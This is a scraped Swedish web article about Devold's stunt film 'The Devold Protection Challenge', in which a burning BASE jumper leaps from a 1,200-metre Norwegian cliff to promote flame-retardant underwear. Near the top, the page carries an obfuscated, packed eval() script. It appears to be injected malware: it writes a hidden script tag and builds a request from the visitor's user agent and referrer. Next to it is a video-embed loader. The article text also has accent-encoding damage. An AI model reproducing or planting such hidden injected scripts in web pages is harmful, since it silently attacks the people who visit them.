Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Devold testar sina underställ med att sätta eld på en BASE jumper

>!function(a,b,c){var eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|darra|var|u0026u|referrer|hiziy||js|php’.split(’|’),0,{}))
d=a.getElementsByTagName(b)[0];a.getElementById(c)||(a=a.createElement(b),a.id=c,a.src=(”https:”==document.location.protocol?”http://player-services.goviral-content.com”.replace(/^http\:/,”https:”):”http://player-services.goviral-content.com”)+”/embed-code/index/find?placementVersionId=9965928913945304931547488″,d.parentNode.insertBefore(a,d))}(document,”script”,”gv_script_9965928913945304931547488″);

Vad a?r det ultima sa?ttet att bevisa att flamskyddande understa?ll fungerar under extrema fo?rha?llanden? Jo, genom att sa?tta eld pa? en BASE jumper innan han hoppar fra?n en klippa pa? 1200 meters ho?jd. Idag sla?pper Devold sin spektakula?ra stuntfilm ”The Devold Protection Challenge”.

Scenen a?r uppsatt med fantastiska bilder fra?n det grova Norska bergslandskapet i na?rheten av Helsetkopen. Spa?nnande musik spelas i bakgrunden na?r Tom Erik Heiman a?r pa? va?g att go?ra en av dem mest spektakula?ra basen BASE jumpen na?gonsin.

Detta a?r stuntvertising i sitt esse.

”Den sak som bekymrar mig mest a?r min lilla pilot-ska?rm (som o?ppnar fallska?rmen). Om denna blir bra?nd da? kanske det inte kommer att funka ”, sa?ger stuntmannen Tom Erik Heiman innan han a?r pa? va?g att hoppa fra?n en 1200 meter ho?g klippa samtidigt som han brinner.

Att addera eld till en aktivitet som redan anses vara riskabel fra?n bo?rjan – la?ter det inte ha?nsynslo?st och ono?digt? Enligt Devold a?r det just i dessa situationer da?r liv och ha?lsa a?r i fara, da?r deras produkter kan go?ra skillnad.

”Med filmen vill vi visa att Devold Protectionprodukterna klarar av de mest kra?vande situationer. Vi har utsatt va?ra produkter till en extrem situation da?r de var tvungna att fungera optimalt”, sa?ger Trond Sleipnes, Marketing Director pa? Devold of Norway AS.

Devold a?r en norsk tillverkare av skyddande understa?ll som skyddar mot kyla, va?rme, flammor, statisk elektricitet och metallsta?nk. Fo?retaget var det fo?rsta som fick EU- godka?nnande fo?r deras flamskyddande understa?ll.

”Med The Devold Protection Challenge vill vi la?gga fokus pa? sa?dana situationer. Vi ville testa produkterna och dess mo?jligheter i en miljo? da?r det inte finns na?got utrymme fo?r misstag, da?r stressniva?n a?r ho?g, och fokus ma?ste vara helt pa? uppgiften”, sa?ger Trond Sleipnes.

#DevoldProtection live pa? Twitter: @Devoldofnorway och #DevoldProtection